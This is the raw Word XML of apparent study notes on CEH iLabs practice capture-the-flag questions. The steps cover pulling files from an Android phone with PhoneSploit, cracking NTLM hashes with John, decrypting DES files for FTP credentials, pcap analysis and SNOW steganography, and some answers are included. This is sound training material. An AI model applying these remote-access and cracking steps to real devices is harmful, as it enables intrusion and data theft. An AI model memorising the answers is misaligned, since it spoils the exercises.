          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>option</w:t>
      </w:r>
      <w:r w:rsidRPr="5787A77D" w:rsidR="5F9236F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4-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="5787A77D" w:rsidR="0F3231F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cd </w:t>
      </w:r>
      <w:r w:rsidRPr="5787A77D" w:rsidR="0F3231F9">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sdcard</w:t>
      </w:r>
      <w:r w:rsidRPr="5787A77D" w:rsidR="0F3231F9">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-&gt;ls-&gt;cd Download-&gt;ls-&gt;cat confidential.txt-&gt;ans</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5787A77D" w:rsidP="5787A77D" w:rsidRDefault="5787A77D" w14:paraId="6B904E8C" w14:textId="1BC39A1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2F4EB02" w:rsidP="52F4EB02" w:rsidRDefault="52F4EB02" w14:paraId="7091D010" w14:textId="7BF5E5C3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874DB5B" w:rsidP="52F4EB02" w:rsidRDefault="2874DB5B" w14:paraId="3E918FF0" w14:textId="52E1E4BA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1.8 </w:t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>An attacker has hacked one of the employee's Android devices in CEHORG and initiated a LOIC attack from the device.</w:t>
      </w:r>
      <w:r>
        <w:br/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an ethical hacker who had obtained a screenshot of the attack using a background application.</w:t>
      </w:r>
      <w:r>
        <w:br/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Obtain the screenshot of the attack using PhoneSploit from the attacked mobile device and determine the targeted machine IP along with the send method.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2874DB5B" w:rsidP="52F4EB02" w:rsidRDefault="2874DB5B" w14:paraId="24965230" w14:textId="6CA2C8B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Answer format: </w:t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>NNN.NN.NN</w:t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>/AAAA</w:t>
      </w:r>
      <w:r w:rsidRPr="52F4EB02" w:rsidR="39F464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52F4EB02" w:rsidR="39F46457">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:r w:rsidRPr="52F4EB02" w:rsidR="39F46457">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/http)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6BDE7B0F" w:rsidP="52F4EB02" w:rsidRDefault="6BDE7B0F" w14:paraId="6DDC1149" w14:textId="6F8BA41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6BDE7B0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-&gt; in android phone, ss gets saved into </w:t>
      </w:r>
      <w:r w:rsidRPr="52F4EB02" w:rsidR="6BDE7B0F">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sdcard</w:t>
      </w:r>
      <w:r w:rsidRPr="52F4EB02" w:rsidR="6BDE7B0F">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-&gt;DCIM-&gt;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ls-&gt;capture.png</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7E01FA89" w:rsidP="52F4EB02" w:rsidRDefault="7E01FA89" w14:paraId="12B8DBD9" w14:textId="2697655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-&gt; to download use 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phonesploit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option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9</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7E01FA89" w:rsidP="52F4EB02" w:rsidRDefault="7E01FA89" w14:paraId="2FC06256" w14:textId="2BF467A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-&gt;enter the file location: /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sdcard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/DCIM/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7E01FA89" w:rsidP="52F4EB02" w:rsidRDefault="7E01FA89" w14:paraId="758E2669" w14:textId="3807792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-&gt;DCIM gets saved into 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phonesploit</w:t>
      </w:r>
      <w:r w:rsidRPr="52F4EB02" w:rsidR="7E01FA89">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-&gt; then open</w:t>
      </w:r>
      <w:r w:rsidRPr="52F4EB02" w:rsidR="69EEB4F8">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-&gt; use the flag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="69EEB4F8" w:rsidP="52F4EB02" w:rsidRDefault="69EEB4F8" w14:paraId="684318DA" w14:textId="1FE8D5C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69EEB4F8">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/home/attacker/phonesploit/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2874DB5B" w:rsidP="52F4EB02" w:rsidRDefault="2874DB5B" w14:paraId="1F8AF911" w14:textId="46CF8CD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1.9 An attacker installed a malicious mobile application </w:t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>AntiMalwarescanner.apk</w:t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 the victim’s Android device which is located in EH workstation-2 Documents folder.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="52F4EB02" w:rsidR="2874DB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assigned a task to perform a security audit on the mobile application and find out whether the application is using permission to Read call-logs.</w:t>
      </w:r>
      <w:r w:rsidRPr="52F4EB02" w:rsidR="213BA2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Ans </w:t>
      </w:r>
      <w:r w:rsidRPr="52F4EB02" w:rsidR="213BA290">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>( Yes</w:t>
      </w:r>
      <w:r w:rsidRPr="52F4EB02" w:rsidR="213BA2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</w:t>
      </w:r>
      <w:r w:rsidRPr="52F4EB02" w:rsidR="213BA290">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Aaa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52F4EB02" w:rsidP="52F4EB02" w:rsidRDefault="52F4EB02" w14:paraId="6BE55C22" w14:textId="070FA49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64B2323" w:rsidP="52F4EB02" w:rsidRDefault="564B2323" w14:paraId="3AEDFDC0" w14:textId="3AF6535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564B232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1.10 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>An ex-employee of CEHORG is suspected to be performing insider attack.</w:t>
      </w:r>
      <w:r>
        <w:br/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assigned a task to attain KEYCODE-75 used in the employee’s mobile phone.</w:t>
      </w:r>
      <w:r>
        <w:br/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Note: Use option p in PhoneSploit for the next page.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5BE4017B" w:rsidP="52F4EB02" w:rsidRDefault="5BE4017B" w14:paraId="761DA4E4" w14:textId="487DFA21">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pP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>Answer format: AAAAAAAA</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5BE4017B" w:rsidP="52F4EB02" w:rsidRDefault="5BE4017B" w14:paraId="660F5BCF" w14:textId="54D1D0F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>-&gt;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>phonesploit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>-&gt;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>option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p-&gt; no 75-&gt;KEYCODE APOSTROPHE-&gt;2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vertAlign w:val="superscript"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nd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part is the </w:t>
      </w:r>
      <w:r w:rsidRPr="52F4EB02" w:rsidR="5BE4017B">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ans</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52F4EB02" w:rsidP="52F4EB02" w:rsidRDefault="52F4EB02" w14:paraId="2829F0DD" w14:textId="3C6E17F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573EC9D" w:rsidP="52F4EB02" w:rsidRDefault="5573EC9D" w14:paraId="4702B942" w14:textId="16D52B3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5573EC9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1.11 </w:t>
      </w:r>
      <w:r w:rsidRPr="52F4EB02" w:rsidR="5573EC9D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CEHORG hosts multiple IoT devices and sensors to manage its supply chain fleet.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="52F4EB02" w:rsidR="5573EC9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assigned a task to examine the file "IOT Traffic.pcapng" located in the Home directory of the root user in the "EH Workstation – 1" machine.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="52F4EB02" w:rsidR="5573EC9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Analyze the packet and find the topic of the message sent to the sensor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5573EC9D" w:rsidP="52F4EB02" w:rsidRDefault="5573EC9D" w14:paraId="6254C7A3" w14:textId="728F9277">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidRPr="52F4EB02" w:rsidR="5573EC9D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Answer format: Aaaaa_Aaaaa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="152BE87B" w:rsidP="52F4EB02" w:rsidRDefault="152BE87B" w14:paraId="6EF3250E" w14:textId="3BF1E13A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Same as above mqtt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="152BE87B" w:rsidP="52F4EB02" w:rsidRDefault="152BE87B" w14:paraId="7C43777C" w14:textId="173F67E2">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pP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Answer format: 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Aaaaa_Aaaaa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52F4EB02" w:rsidP="52F4EB02" w:rsidRDefault="52F4EB02" w14:paraId="1686DA18" w14:textId="21AF7EA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52BE87B" w:rsidP="52F4EB02" w:rsidRDefault="152BE87B" w14:paraId="5B5DC3EC" w14:textId="4F5F146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1.12 CEHORG hosts multiple IOT devices and network sensors to manage its IT department.</w:t>
      </w:r>
      <w:r>
        <w:br/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assigned a task to examine the file "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NetworkNS_Traffic.pcapng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located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the Documents folder of the user in the "EH Workstation – 2" machine.</w:t>
      </w:r>
      <w:r>
        <w:br/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Analyze the packet and find the alert message sent to the sensor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="152BE87B" w:rsidP="52F4EB02" w:rsidRDefault="152BE87B" w14:paraId="4337FD2B" w14:textId="6411F778">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pP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Answer format: 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Aaaa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Aaaa"aaa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="152BE87B" w:rsidP="52F4EB02" w:rsidRDefault="152BE87B" w14:paraId="5784C76D" w14:textId="6364850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-&gt; sensor-&gt;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mqtt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="152BE87B" w:rsidP="52F4EB02" w:rsidRDefault="152BE87B" w14:paraId="0C9F6518" w14:textId="526CE3C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-&gt;filter-&gt;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mqtt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-&gt; publish msg-&gt;inside stream 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>ans</w:t>
      </w:r>
      <w:r w:rsidRPr="52F4EB02" w:rsidR="152BE8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hidden-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="52F4EB02" w:rsidR="56CE40B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according to given </w:t>
      </w:r>
      <w:r w:rsidRPr="52F4EB02" w:rsidR="56CE40B1">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ans</w:t>
      </w:r>
      <w:r w:rsidRPr="52F4EB02" w:rsidR="56CE40B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format</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52F4EB02" w:rsidP="52F4EB02" w:rsidRDefault="52F4EB02" w14:paraId="77AD2D32" w14:textId="3EA7463C">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="152BE87B" w:rsidP="52F4EB02" w:rsidRDefault="152BE87B" w14:paraId="44F02510" w14:textId="654EC16C">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="152BE87B">
        <w:drawing>
          <wp:inline wp14:editId="44389841" wp14:anchorId="0C9F3CDD">
            <wp:extent cx="5686425" cy="2543175"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="139284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a67310dd7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4EB02" w:rsidP="52F4EB02" w:rsidRDefault="52F4EB02" w14:paraId="1D21ED77" w14:textId="0A32B5E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2F4EB02" w:rsidP="52F4EB02" w:rsidRDefault="52F4EB02" w14:paraId="7A2D0D34" w14:textId="10160F5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E28BFC5" w:rsidP="52F4EB02" w:rsidRDefault="0E28BFC5" w14:paraId="2658A17E" w14:textId="78B111F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1.13 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>An attacker had sent a message 166.150.247.183/US to the victim.</w:t>
      </w:r>
      <w:r>
        <w:br/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assigned to perform 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>footprinting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using shodan.io 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>in order to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whether the message belongs to SCADA/ICS/IoT systems in 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>US.(</w:t>
      </w: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>AaA)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0E28BFC5" w:rsidP="52F4EB02" w:rsidRDefault="0E28BFC5" w14:paraId="1B4AEC57" w14:textId="32121816">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pP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>Ans- IoT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52F4EB02" w:rsidP="52F4EB02" w:rsidRDefault="52F4EB02" w14:paraId="1AEAD55D" w14:textId="51E1950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E28BFC5" w:rsidP="52F4EB02" w:rsidRDefault="0E28BFC5" w14:paraId="60600196" w14:textId="0B5F844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0E28BF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1.14 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>A file named Cry-DES (ECB)-FTP-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>IP.hex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located in the Documents folder in the "Ethical Hacker-2" machine.</w:t>
      </w:r>
      <w:r>
        <w:br/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It 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credentials to connect to an FTP server. However, the file is encrypted using DES(ECB) algorithm.</w:t>
      </w:r>
      <w:r>
        <w:br/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Decrypt the file to get the FTP credentials, connect to the FTP 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>server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obtain the file named "flag1.txt".</w:t>
      </w:r>
      <w:r>
        <w:br/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Enter the content in the file as the answer.</w:t>
      </w:r>
      <w:r>
        <w:br/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Note: Use "Blackhat" as the FTP username.</w:t>
      </w:r>
      <w:r>
        <w:br/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Ans: 4700056</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1A5A362E" w:rsidP="52F4EB02" w:rsidRDefault="1A5A362E" w14:paraId="1814C648" w14:textId="4726C51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 in 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>CrypTool</w:t>
      </w:r>
      <w:r w:rsidRPr="52F4EB02" w:rsidR="1A5A362E">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-&gt; Blackhat is the password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1A5A362E" w:rsidRDefault="1A5A362E" w14:paraId="34EA55F8" w14:textId="55384828">
      <w:r w:rsidR="1A5A362E">
        <w:drawing>
          <wp:inline wp14:editId="30198D8C" wp14:anchorId="43A90BC8">
            <wp:extent cx="5629275" cy="3619500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="23613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26bbb9a50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4EB02" w:rsidRDefault="52F4EB02" w14:paraId="2692A5D5" w14:textId="3E7E94B8"/>
    <w:p w:rsidR="476D49E3" w:rsidRDefault="476D49E3" w14:paraId="2F80F94A" w14:textId="3B82A06E">
      <w:r w:rsidR="476D49E3">
        <w:rPr/>
        <w:t xml:space="preserve">1.15 An employee in an organization has stolen important bank credentials and stored </w:t>
      </w:r>
      <w:r w:rsidR="476D49E3">
        <w:rPr/>
        <w:t>it</w:t>
      </w:r>
      <w:r w:rsidR="476D49E3">
        <w:rPr/>
        <w:t xml:space="preserve"> in a file named Confidential.txt using steganography.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="476D49E3">
        <w:rPr/>
        <w:t xml:space="preserve"> The file has been </w:t>
      </w:r>
      <w:r w:rsidR="476D49E3">
        <w:rPr/>
        <w:t>identified</w:t>
      </w:r>
      <w:r w:rsidR="476D49E3">
        <w:rPr/>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="476D49E3">
        <w:rPr/>
        <w:t>retained</w:t>
      </w:r>
      <w:r w:rsidR="476D49E3">
        <w:rPr/>
        <w:t xml:space="preserve"> from his email attachment and stored in the machine named "Ethical Hacker-2."</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="476D49E3">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="476D49E3">
        <w:rPr/>
        <w:t>Determine</w:t>
      </w:r>
      <w:r w:rsidR="476D49E3">
        <w:rPr/>
        <w:t xml:space="preserve"> the information hidden in the file along with the account number present in the file.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="476D49E3">
        <w:rPr/>
        <w:t xml:space="preserve"> Path: C:\Users\Admin\Documents\Snow\Confidential.txt</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="476D49E3">
        <w:rPr/>
        <w:t xml:space="preserve"> Note: The password is not shown.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="476D49E3" w:rsidRDefault="476D49E3" w14:paraId="055293E1" w14:textId="43455FCC">
      <w:r w:rsidR="476D49E3">
        <w:rPr/>
        <w:t>-&gt;snow/</w:t>
      </w:r>
      <w:r w:rsidR="476D49E3">
        <w:rPr/>
        <w:t>openstego</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52F4EB02" w:rsidRDefault="52F4EB02" w14:paraId="100CFA7E" w14:textId="57ABC5B9"/>
    <w:p w:rsidR="52F4EB02" w:rsidRDefault="52F4EB02" w14:paraId="35BD017E" w14:textId="315FFCB5"/>
    <w:p w:rsidR="1170652C" w:rsidRDefault="1170652C" w14:paraId="59361432" w14:textId="5F7DF98B">
      <w:r w:rsidR="1170652C">
        <w:rPr/>
        <w:t xml:space="preserve">CEH </w:t>
      </w:r>
      <w:r w:rsidR="1170652C">
        <w:rPr/>
        <w:t>iLabs</w:t>
      </w:r>
      <w:r w:rsidR="6634F846">
        <w:rPr/>
        <w:t xml:space="preserve">   Demo CTF</w:t>
      </w:r>
      <w:r w:rsidR="0EE356D1">
        <w:rPr/>
        <w:t xml:space="preserve"> Questions</w:t>
      </w:r>
      <w:r w:rsidR="6634F846">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="329A75BC">
        <w:rPr/>
        <w:t>( Cryptography</w:t>
      </w:r>
      <w:r w:rsidR="329A75BC">
        <w:rPr/>
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2951FC59" w:rsidP="57713CA2" w:rsidRDefault="2951FC59" w14:paraId="3C70E671" w14:textId="78496A22">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="57713CA2" w:rsidR="2951FC59">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1.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assigned a task to crack the </w:t>
      </w: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NTLM password hashes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captured by the internal security team.</w:t>
      </w:r>
      <w:r>
        <w:br/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password hash has been stored in the </w:t>
      </w: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Documents folder of the Parrot Security console machine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What is the password of user James?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2951FC59" w:rsidP="57713CA2" w:rsidRDefault="2951FC59" w14:paraId="562A9E1F" w14:textId="10D38F1D">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
      </w:pP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7713CA2" w:rsidR="2951FC59">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Aaaaaaa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2951FC59" w:rsidRDefault="2951FC59" w14:paraId="5B703238" w14:textId="1E82D35E">
      <w:r w:rsidR="2951FC59">
        <w:drawing>
          <wp:inline wp14:editId="11A70AC4" wp14:anchorId="3C057BBC">
            <wp:extent cx="5943600" cy="1952625"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="431863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4a23a9597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51FC59" w:rsidRDefault="2951FC59" w14:paraId="18B569D0" w14:textId="24C5DB2B">
      <w:r w:rsidR="2951FC59">
        <w:rPr/>
        <w:t>James’s 2</w:t>
      </w:r>
      <w:r w:rsidRPr="57713CA2" w:rsidR="2951FC59">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>nd</w:t>
      </w:r>
      <w:r w:rsidR="2951FC59">
        <w:rPr/>
        <w:t xml:space="preserve"> half is the hashed pass. Simply crack using online tool.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2951FC59" w:rsidP="57713CA2" w:rsidRDefault="2951FC59" w14:paraId="53E48939" w14:textId="5059FA80">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidR="2951FC59">
        <w:rPr/>
        <w:t>2.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assigned a task to crack the </w:t>
      </w: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NTLM password hashes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captured by the internal security team.</w:t>
      </w:r>
      <w:r>
        <w:br/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password hash has been stored in the </w:t>
      </w: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Documents folder of the Parrot Security console machine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What is the password of user Jones?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2951FC59" w:rsidP="57713CA2" w:rsidRDefault="2951FC59" w14:paraId="313108BD" w14:textId="53AE03C3">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidRPr="57713CA2" w:rsidR="2951FC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57713CA2" w:rsidR="2951FC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7713CA2" w:rsidR="2951FC59">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NNNNNNNN</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2951FC59" w:rsidRDefault="2951FC59" w14:paraId="2A2BF521" w14:textId="38118899">
      <w:r w:rsidR="2951FC59">
        <w:rPr/>
        <w:t xml:space="preserve">To solve this, save the hash in a fresh </w:t>
      </w:r>
      <w:r w:rsidR="2951FC59">
        <w:rPr/>
        <w:t>text</w:t>
      </w:r>
      <w:r w:rsidR="2951FC59">
        <w:rPr/>
        <w:t xml:space="preserve"> if necessary, the use John</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2951FC59" w:rsidRDefault="2951FC59" w14:paraId="23ECA538" w14:textId="25B0170E">
      <w:r w:rsidR="2951FC59">
        <w:rPr/>
        <w:t>-&gt; john test.txt [ takes some time though]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="22B7B99F" w:rsidRDefault="22B7B99F" w14:paraId="6B20F932" w14:textId="1AC834AC"/>
    <w:p w:rsidR="22B7B99F" w:rsidP="22B7B99F" w:rsidRDefault="22B7B99F" w14:paraId="6429D180" w14:textId="3D5D4329">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="4CBD5A1F" w:rsidP="22B7B99F" w:rsidRDefault="4CBD5A1F" w14:paraId="109E1914" w14:textId="28E47C6C">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidR="4CBD5A1F">
        <w:rPr/>
        <w:t>3.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 employee in your organization is suspected of sending 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>important information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an accomplice outside the organization.</w:t>
      </w:r>
      <w:r>
        <w:br/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incident response team has intercepted some files from the employee’s system that they believe have hidden information.</w:t>
      </w:r>
      <w:r>
        <w:br/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asked to investigate a file named </w:t>
      </w:r>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="4CBD5A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Confidential.txt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extract hidden information.</w:t>
      </w:r>
      <w:r>
        <w:br/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CBD5A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Find out the information hidden in the file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4CBD5A1F" w:rsidP="22B7B99F" w:rsidRDefault="4CBD5A1F" w14:paraId="6F38EE54" w14:textId="6CB4E27A">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="4CBD5A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Note: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</w:t>
      </w:r>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="4CBD5A1F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Confidential.txt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is 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>located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at:</w:t>
      </w:r>
      <w:r>
        <w:br/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CBD5A1F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C:\Users\Admin\Documents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</w:t>
      </w:r>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="4CBD5A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EH Workstation – 2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>machine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CBD5A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4CBD5A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CBD5A1F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AaaaaAaaaaaaNNNNN</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0DF63B49" w:rsidP="22B7B99F" w:rsidRDefault="0DF63B49" w14:paraId="7FE15DEA" w14:textId="1287A29F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B99F" w:rsidR="0DF63B49">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ans: use snow.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0DF63B49" w:rsidP="22B7B99F" w:rsidRDefault="0DF63B49" w14:paraId="1AF54B64" w14:textId="0EF59044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B99F" w:rsidR="0DF63B49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-&gt; SNOW.EXE -C Confidential.txt </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0DF63B49" w:rsidP="22B7B99F" w:rsidRDefault="0DF63B49" w14:paraId="2A6070DB" w14:textId="3C9EBC74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B99F" w:rsidR="0DF63B49">
